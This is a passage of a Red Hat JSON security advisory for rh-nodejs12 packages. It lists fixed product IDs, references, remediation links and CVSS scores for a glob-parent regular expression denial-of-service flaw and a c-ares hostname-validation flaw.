"7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-28469" }, { "category": "external", "summary": "RHBZ#1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-28469", "url": "https://www.cve.org/CVERecord?id=CVE-2020-28469" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905", "url": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905" } ], "release_date": "2021-01-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-glob-parent: Regular expression denial of service" }, { "cve": "CVE-2021-3672", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2021-07-30T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1988342" } ], "notes": [ { "category": "description", "text": "A flaw was found in c-ares library, where a missing input validation check of host names returned by DNS (Domain Name Servers) can lead to output of wrong hostnames which might potentially lead to Domain Hijacking. The highest threat from this vulnerability is to confidentiality and integrity as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "c-ares: Missing input validation of host names may lead to domain hijacking", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3672" }, { "category": "external", "summary": "RHBZ#1988342", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1988342" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3672", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3672" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3672", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3672" }, { "category": "external", "summary": "https://c-ares.haxx.se/adv_20210810.html", "url": "https://c-ares.haxx.se/adv_20210810.html" } ], "release_date": "2021-08-10T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", 